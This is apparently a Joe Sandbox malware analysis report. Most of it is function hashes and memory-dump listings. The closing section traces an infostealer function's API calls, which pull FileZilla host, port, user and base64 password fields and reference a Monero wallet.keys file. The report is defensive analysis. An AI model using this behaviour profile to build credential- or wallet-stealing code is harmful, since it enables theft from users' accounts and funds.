                                  • Instruction ID: bb426a301c3af8d8f2781265e384c77bee4985e2e697e04b7da7a07cf1961fbf
                                  • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction Fuzzy Hash: 4D91A271B002158BDF15CE68DC80BBAB3A1EF65304F19656EEA14BB392D362DD07C7A1
                                  Function 00EE96FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction ID: f126d26b59416eebb5c22600da7dc3c611e0602f4254579707a601023e8feae4
                                  • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction Fuzzy Hash: B6B15B316106489FD719CF29C48ABA47BE0FF45368F29965CE899DF2A3C336D981CB40
                                  Function 00EBB198 Relevance: .3, Instructions: 268COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction ID: 7f3d1f2a478cfdf7bd872245547f14913c5d2fac6c77af4db24669661aa2c1eb
                                  • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction Fuzzy Hash: 91C14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E9A6CF81
                                  Function 00ECD5A8 Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction ID: 011634bc16e6fc5b717470b2e67a857b64d3b02661a11b99752d59f2d3c96cb2
                                  • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction Fuzzy Hash: FB9139319287916AE7168B38CD41BAAB794FFE6350F14D32EF98872491EB7385828345
                                  Function 00EDD39E Relevance: .2, Instructions: 242COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction ID: 060a746b14ec32ffed5c8a714be4f52df44a4beeb135d733c377da29cd71d68b
                                  • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction Fuzzy Hash: 12A13F72A04A19CBEB19CF59CCC1A9EBBB1FB54314F14D22AD41AE73A0D334A945CF90
                                  Function 00EA4288 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: 0009fa33b11bbfc8ec7b5beb41e5d784701e0b49caf64d3a79154cc630c9ed6c
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: DEA17172E083119BD308CF25C89075BF7E2EFC8710F1AC93DA8999B254D7B4E9459B82
                                  Function 01329592 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11d831b8339698192456e6e74c53fbc82f424317e8ce45417f87d8eabb7d9b8a
                                  • Instruction ID: d7ca6e4bd29c17bb06c0f49536021230e4db1664150a964ced4726338ad007cd
                                  • Opcode Fuzzy Hash: 11d831b8339698192456e6e74c53fbc82f424317e8ce45417f87d8eabb7d9b8a
                                  • Instruction Fuzzy Hash: 4A514BF260C624DFD714BE29D88577EBBE9EB54328F16482DD6C6C7A00E2359880CB57
                                  Function 00ED6799 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: 28c435171d94522aab6a8463c4e6cdc68f7808834f016374556056740f06fdca
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 9C515D62E09BD989C7058B7544502EEBFB25FE6204F1E839EC4982F383C335568AD3E5
                                  Function 01373DEF Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14c01da5d5ce44614083870d123e0ee766e1c437674121ccee0120492a1294f6
                                  • Instruction ID: 2408e322aa1adfb0e3581be0dc9d62b7518e9e4eba43e2a6c8c20a5c4fb39401
                                  • Opcode Fuzzy Hash: 14c01da5d5ce44614083870d123e0ee766e1c437674121ccee0120492a1294f6
                                  • Instruction Fuzzy Hash: EF2162B250C300AFE315AE59DCC17ABF7E9FB58320F16492DEBD543750D63568008A97
                                  Function 00EA75A8 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Function 00E79AA0 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00E703B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00E80DBF,00E80DBE,00E80DBB,00E80DBA), ref: 00E704C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E704C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E704E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E704F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E7052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E7053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00E70579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E705C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E705D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E7067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E70692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E706AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E706C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00E706D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 00E706E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E706F3
                                  • lstrcat.KERNEL32(?,00E81770), ref: 00E70702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70715
                                  • lstrcat.KERNEL32(?,00E81774), ref: 00E70724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00E70733
